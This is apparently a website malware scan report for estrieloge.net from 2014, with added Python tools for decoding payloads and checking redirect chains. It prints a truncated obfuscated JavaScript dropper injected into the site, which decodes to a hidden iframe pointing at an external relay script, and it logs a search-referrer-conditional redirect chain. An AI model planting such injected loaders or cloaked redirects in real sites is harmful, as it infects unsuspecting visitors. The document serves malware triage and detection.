Scanned pages/files
Request: http://estrieloge.net/
Server response: 200 OK; Content-Length: 5669; Content-Type: text/html
Status: malicious
Malicious code (confirmed by antiviruses, see below):
ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,153,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,153,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21,16,44,1
The dropper assembles the string "split" from three literals so that a plain signature for split(",") does not match, and keeps its real payload as a comma-separated list of encoded character codes; the routine that decodes and executes that list is cut off in this capture.
Antivirus reports:

Request: http://estrieloge.net/test404page.js (scanner probe for a file that should not exist)
Server response: 404 Not Found; Content-Length: 331; Content-Type: text/html
Status: clean
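The decoding routine is missing from the capture above, so here is an added triage example (my own Python, not part of the scanner's output) that runs over the encoded tokens exactly as recorded. The transform it applies, each token read as octal and reduced by 4, is an inference from the data rather than something the page states: it is the transform that turns the list into readable JavaScript. The truncated final token "1" is kept on purpose to show how a decoder should report it rather than crash.

```python
import re
from typing import Dict, List, Optional, Tuple

# Dropper exactly as captured in the scan above; the capture ends mid-token at "44,1".
CAPTURED = (
    'ps="sp"+"li"+"t";asd=function(){d.body--};a=("44,152,171,162,147,170,155,163,162,'
    '44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,153,44,101,44,150,'
    '163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,'
    '54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,153,62,167,166,147,44,101,44,'
    '53,154,170,170,164,76,63,63,167,155,153,171,62,157,171,162,150,151,162,167,151,155,'
    '170,151,62,151,171,63,146,155,162,63,166,151,160,145,175,62,164,154,164,53,77,21,16,44,1'
)

CONCAT_RE = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def fold_string_concats(js: str) -> str:
    """Collapse "sp"+"li"+"t"-style literal concatenation used to hide keywords from signatures."""
    prev = None
    while prev != js:
        prev, js = js, CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def extract_payload(snippet: str) -> List[str]:
    """Pull the comma-separated numeric tokens out of the a=("...") assignment."""
    m = re.search(r'a=\("([\d,]+)', snippet)
    if not m:
        raise ValueError("no encoded payload found")
    return m.group(1).split(",")


def decode_token(tok: str, base: int = 8, offset: int = 4) -> Optional[str]:
    """Decode one token; None when it is not a valid number or maps outside Unicode.

    Assumption: the real dropper computes String.fromCharCode(parseInt(tok, 8) - 4);
    that loop is not in the capture, but this transform yields readable JavaScript.
    """
    try:
        code = int(tok, base) - offset
    except ValueError:
        return None
    if code < 0 or code > 0x10FFFF:
        return None
    return chr(code)


def decode_payload(tokens: List[str], base: int = 8, offset: int = 4) -> Tuple[str, List[int]]:
    """Decode all tokens, returning the text and the indexes that failed (e.g. a truncated tail)."""
    chars, bad = [], []
    for i, tok in enumerate(tokens):
        ch = decode_token(tok, base, offset)
        if ch is None:
            bad.append(i)
        else:
            chars.append(ch)
    return "".join(chars), bad


def analyze(snippet: str) -> Dict[str, object]:
    """Full triage pass: unfold string tricks, decode the payload, pull out indicators."""
    tokens = extract_payload(snippet)
    text, bad = decode_payload(tokens)
    return {
        "folded_prefix": fold_string_concats(snippet)[:20],
        "decoded": text,
        "undecodable_tokens": bad,
        "urls": URL_RE.findall(text),
        "creates_iframe": "createElement('iframe')" in text,
    }


if __name__ == "__main__":
    for k, v in analyze(CAPTURED).items():
        print(k, "=", repr(v))
```

The decoded text declares a function that creates an iframe and points its src at an external relay.php, which is the hidden-iframe injection pattern; the relay URL is the indicator worth blocking and pivoting on. Because the capture is cut off, the decoder reports the dangling last token instead of silently dropping it, so an analyst knows the remaining behaviour (where the iframe is appended, its size, how the function is invoked) is unknown rather than absent.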
Malicious/Suspicious Redirects
Each hop was requested with a Google search URL in the Referer header (the scanner's imitation of a visitor arriving from a search engine). Answered that way, the site returns a permanent redirect to a bare IP address, which forwards to an OpenX ad-delivery script on a third domain, which in turn sends the visitor on to google.com.

Hop 1
URL: http://estrieloge.net/ (imitation of visitor from search engine)
Request:
GET / HTTP/1.1
Host: estrieloge.net
Referer: http://www.google.com/search?q=redirect+check1
Response:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 23:28:32 GMT
Location: http://212.227.7.91/easydox/count.php
Server: Apache
Content-Length: 245
Content-Type: text/html; charset=iso-8859-1
Status: malicious

Hop 2
URL: http://212.227.7.91/easydox/count.php (imitation of visitor from search engine)
Request:
GET /easydox/count.php HTTP/1.1
Host: 212.227.7.91
Referer: http://www.google.com/search?q=redirect+check2
Response:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 29 Sep 2014 23:28:31 GMT
Location: http://zhucova.automotiveeventregistration.com/openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F
Server: Apache
Content-Length: 1604
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: PwM=31; path=/; domain=212.227.7.91; expires=Tue, 07-Oct-2014 08:30:31 GMT
Status: suspicious

Hop 3
URL: http://zhucova.automotiveeventregistration.com/openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F (imitation of visitor from search engine)
Request:
GET /openx/www/delivery/spc.php?zones=WP-Home-Floating-Testing%3D1365%7CWP-Home-Leaderboard%3D209%7CWP-Home-ButtonGateway%3D1497%7CWP-Home-TopBanner%3D210%7CWP-Home-TopRight1%3D230%7CWP-Home-TopRight2%3D213%7CWP-Home-TopRight3%3D578%7CWP-Home-TopRight4%3D2067%7CWP-Home-CenterRight%3D214%7CWP-Home-DownRight%3D217%7CWP-Home-Center1%3D215%7CWP-Home-Center2%3D225%7CWP-Home-BottomBanner%3D2061%7CWP-Home-TopSide%3D208%7CWP-Home-DownSide%3D602%7CWP-LALightSuplement%3D2346%7CWP-Gateway-MissIndo%3D2347%7Cokezone.com%20-%20Leaderboard-expand%3D2461%7CWP-Home-SkinLeft%3D2607%7CWP-Home-SkinRight%3D2608%7CWP-Home-ButtonGateway2%3D2628%7CWP-Home-Slide1%3D2636%7CWP-Home-Slide2%3D2637%7CWP-Home-Slide3%3D2638%7CWP-Home-Slide4%3D2639%7CWP-Home-Slide5%3D2640%7CWP-Home-Slide6%3D2641%7CWP-Home-Slide7%3D2642%7CWP-Home-Slide8%3D2643%7CWP-Home-Slide9%3D2644%7CWP-Home-Slide10%3D2645%7CWP-Home-Slide11%3D2647%7CWP-Home-Slide12%3D2648%7CWP-Home-Slide13%3D2649%7CWP-Home-Slide14%3D2650%7CWP-articke-corner%3D2651%7CWP-Home-TopSlide%3D2652%7CWP-Home-Sliding1%3D2653%7CWP-Home-Sliding2%3D2654%7CWP-Home-Sliding3%3D2655%7CWP-Home-Sliding4%3D2656%7CWP-Home-Sliding5%3D2657%7CWP-Home-Sliding6%3D2658%7CWP-Home-Sliding7%3D2659%7CWP-Home-Sliding8%3D2660%7CWP-Home-Sliding9%3D2661%7CWP-Home-Sliding10%3D2662%7C&nz=1&source=&r=42459140&charset=UTF-8&loc=http%3A%2F%2F212.227.7.91%2F HTTP/1.1
Host: zhucova.automotiveeventregistration.com
Referer: http://www.google.com/search?q=redirect+check3
Response:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 29 Sep 2014 23:28:32 GMT
Location: http://www.google.com/
Server: nginx/1.1.4
Content-Length: 160
Content-Type: text/html
Status: suspicious
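To reproduce the check the scanner ran, here is an added Python example (my own, not the scanner's code) that visits a URL twice, once with no Referer and once claiming to arrive from a Google search, follows each redirect chain one hop at a time, and reports when the two paths diverge or leave the site. The offline run replays a fake fetch function whose answers are transcribed from the captured responses above; the long zones= query string is shortened to its first entry in that sample, and the final google.com hop, which the scan did not fetch, is assumed to answer 200. live_fetch is the real-network variant of the same hook and is not exercised offline.

```python
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urlsplit

SEARCH_REFERER = "http://www.google.com/search?q=redirect+check"
REDIRECT_CODES = {301, 302, 303, 307, 308}
Hop = Tuple[str, int, Optional[str]]
Fetch = Callable[[str, Optional[str]], Tuple[int, Dict[str, str]]]


def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Parse a raw status line plus header block into (status, lower-cased header dict)."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def follow_chain(start_url: str, fetch: Fetch, referer: Optional[str], max_hops: int = 10) -> List[Hop]:
    """Follow Location headers manually; stop on a non-redirect, a loop, or max_hops."""
    hops, url, seen = [], start_url, {start_url}
    for _ in range(max_hops):
        status, headers = fetch(url, referer)
        location = headers.get("location")
        hops.append((url, status, location))
        if status not in REDIRECT_CODES or not location or location in seen:
            break
        seen.add(location)
        url = location
    return hops


def check_conditional_redirect(start_url: str, fetch: Fetch) -> Dict[str, object]:
    """Flag a site that sends search-engine visitors somewhere its direct visitors never go."""
    start_host = urlsplit(start_url).hostname
    plain = follow_chain(start_url, fetch, None)
    referred = follow_chain(start_url, fetch, SEARCH_REFERER)
    plain_hosts = [urlsplit(u).hostname for u, _, _ in plain]
    referred_hosts = [urlsplit(u).hostname for u, _, _ in referred]
    return {
        "plain": plain,
        "referred": referred,
        "conditional": plain_hosts != referred_hosts,
        "offsite_hosts": [h for h in referred_hosts if h != start_host],
    }


# Constructed sample: responses transcribed from the scan above, keyed by (url, referer sent?).
# The zones= parameter is shortened to its first entry for readability.
SPC_URL = ("http://zhucova.automotiveeventregistration.com/openx/www/delivery/spc.php"
           "?zones=WP-Home-Floating-Testing%3D1365%7C&nz=1&loc=http%3A%2F%2F212.227.7.91%2F")
RECORDED = {
    ("http://estrieloge.net/", False):
        "HTTP/1.1 200 OK\r\nContent-Length: 5669\r\nContent-Type: text/html\r\n",
    ("http://estrieloge.net/", True):
        "HTTP/1.1 301 Moved Permanently\r\nLocation: http://212.227.7.91/easydox/count.php\r\nServer: Apache\r\n",
    ("http://212.227.7.91/easydox/count.php", True):
        "HTTP/1.1 302 Found\r\nLocation: " + SPC_URL + "\r\nServer: Apache\r\n",
    (SPC_URL, True):
        "HTTP/1.1 302 Moved Temporarily\r\nLocation: http://www.google.com/\r\nServer: nginx/1.1.4\r\n",
}


def recorded_fetch(url: str, referer: Optional[str]) -> Tuple[int, Dict[str, str]]:
    """Offline stand-in for the network that replays the captured responses."""
    raw = RECORDED.get((url, referer is not None))
    if raw is None:  # assumption: hops the scan did not capture (google.com) answer 200
        raw = "HTTP/1.1 200 OK\r\n"
    return parse_response(raw)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # never auto-follow; we want to see every hop


def live_fetch(url: str, referer: Optional[str], timeout: float = 10) -> Tuple[int, Dict[str, str]]:
    """Real-network fetch of a single hop (3xx responses surface as HTTPError and are returned)."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    if referer:
        req.add_header("Referer", referer)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as e:
        return e.code, {k.lower(): v for k, v in e.headers.items()}


if __name__ == "__main__":
    print(check_conditional_redirect("http://estrieloge.net/", recorded_fetch))
```

Following redirects by hand matters here: a client that auto-follows would report only the final google.com landing and miss the two intermediaries, and the comparison against a Referer-less visit is what distinguishes a conditional (cloaked) redirect from an ordinary site move.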
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estrieloge.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estrieloge.net/
Result: estrieloge.net is not infected or malware details are not published yet.
Neither blacklist listed the domain at the time of this scan (29 Sep 2014, per the response headers above). Blacklist lookups lag behind live observation, and the injected script and the conditional redirect were observed directly, so these negative results do not clear the site.